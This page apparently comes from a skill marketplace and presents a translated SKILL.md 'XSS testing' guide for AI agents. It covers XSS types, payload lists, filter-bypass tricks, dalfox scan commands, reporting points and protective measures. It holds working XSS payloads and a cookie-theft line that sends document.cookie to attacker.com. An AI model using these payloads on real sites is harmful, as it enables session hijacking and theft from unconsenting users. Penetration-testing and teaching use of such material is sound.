xss-testing

Original：🇨🇳 Chinese

Translated

Professional Skills for Cross-Site Scripting (XSS) Attack Testing

1installs

Sourceed1s0nz/cyberstrikeai

Added on2026-02-07

NPX Install

npx skill4agent add ed1s0nz/cyberstrikeai xss-testing

SKILL.md Content (Chinese)

View Translation Comparison →

XSS Testing Skills

Overview

Cross-Site Scripting (XSS) allows attackers to execute malicious JavaScript code in the victim's browser. This skill covers testing methods for Reflected XSS, Stored XSS, and DOM-based XSS.

Types of XSS

1. Reflected XSS

Malicious scripts are passed via URL parameters
The server directly returns a response containing the script
Requires users to click a malicious link

2. Stored XSS

Malicious scripts are stored on the server (database, files, etc.)
All users accessing the affected page will execute the script
Has a wider impact scope

3. DOM-based XSS

Client-side JavaScript improperly handles user input
Does not involve server-side processing
Triggered by modifying the DOM structure

Testing Methods

Basic Payloads

javascript

<script>alert('XSS')</script>
<img src=x onerror=alert('XSS')>
<svg onload=alert('XSS')>
<body onload=alert('XSS')>

Bypassing Filters

Case Bypass

javascript

<ScRiPt>alert('XSS')</ScRiPt>

Encoding Bypass

javascript

%3Cscript%3Ealert('XSS')%3C/script%3E
&#60;script&#62;alert('XSS')&#60;/script&#62;

Event Handlers

javascript

<img src=x onerror=alert(String.fromCharCode(88,83,83))>
<div onmouseover=alert('XSS')>hover</div>
<input onfocus=alert('XSS') autofocus>

Pseudo-protocols

javascript

<a href="javascript:alert('XSS')">click</a>
<iframe src="javascript:alert('XSS')">

Advanced Bypass Techniques

Using String.fromCharCode

javascript

<script>alert(String.fromCharCode(88,83,83))</script>

Using eval and atob

javascript

<script>eval(atob('YWxlcnQoJ1hTUycp'))</script>

Using HTML Entities

javascript

&#60;script&#62;alert('XSS')&#60;/script&#62;

Tool Usage

dalfox

bash

# Basic scan
dalfox url "http://target.com/page?q=test"

# Specify parameters
dalfox url "http://target.com/page" -d "q=test" -X POST

# Use custom payloads
dalfox url "http://target.com/page?q=test" --custom-payload payloads.txt

Burp Suite

Use the Intruder module for batch testing
Use Repeater for manual testing
Use Scanner for automatic detection

Browser Console

Test DOM-based XSS
Check JavaScript execution environment
Debug payloads

Verification and Exploitation

Verification Steps

Confirm the payload is executed
Check if it is filtered or encoded
Test different contexts (HTML, JavaScript, attributes, etc.)
Evaluate impacts (cookie theft, session hijacking, etc.)

Exploitation Scenarios

Cookie theft:

<script>document.location='http://attacker.com/steal?cookie='+document.cookie</script>

Keylogging: Inject keyboard event listeners
Phishing attacks: Forge login forms
Session hijacking: Obtain user session tokens

Report Key Points

XSS type (Reflected/Stored/DOM)
Trigger location and parameters
Complete POC
Impact assessment
Fix recommendations (output encoding, CSP policy, etc.)

Protection Measures

Input validation and filtering
Output encoding (HTML, JavaScript, URL)
Content Security Policy (CSP)
HttpOnly Cookie flag
Use secure frameworks and libraries

xss-testing

NPX Install

Tags

SKILL.md Content (Chinese)

XSS Testing Skills

Overview

Types of XSS

1. Reflected XSS

2. Stored XSS

3. DOM-based XSS

Testing Methods

Basic Payloads

Bypassing Filters

Case Bypass

Encoding Bypass

Event Handlers

Pseudo-protocols

Advanced Bypass Techniques

Using String.fromCharCode

Using eval and atob

Using HTML Entities

Tool Usage

dalfox

Burp Suite

Browser Console

Verification and Exploitation

Verification Steps

Exploitation Scenarios

Report Key Points

Protection Measures